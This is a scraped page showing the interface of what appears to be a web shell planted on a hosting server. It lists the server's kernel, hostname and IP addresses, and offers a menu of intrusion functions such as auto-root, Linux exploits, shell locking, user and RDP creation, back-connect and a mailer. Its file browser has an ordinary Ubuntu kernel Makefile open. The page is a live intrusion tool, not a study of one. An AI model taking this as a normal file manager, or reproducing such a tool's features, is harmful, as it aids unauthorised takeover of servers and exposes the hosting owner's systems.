Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.240
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
ubuntu /
[ HOME SHELL ]
Name
Size
Permission
Action
include
[ DIR ]
drwxr-xr-x
ubuntu-host
[ DIR ]
drwxr-xr-x
Kconfig
565
B
-rw-r--r--
Makefile
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# # Makefile for the Linux kernel ubuntu supplied third-party device drivers. # # # NOTE: to allow drivers to be added and removed without causing merge # collisions you should add new entries in the middle of the six lines # of ## at the bottom of the list. Always add three lines of ## above # your new entry and maintain the six lines below. # ## ## ## ## ## ## obj-$(CONFIG_UBUNTU_HOST) += ubuntu-host/ ## ## ## ## ## ## # This is a stupid trick to get kbuild to create ubuntu/built-in.o obj- += foo.o
Close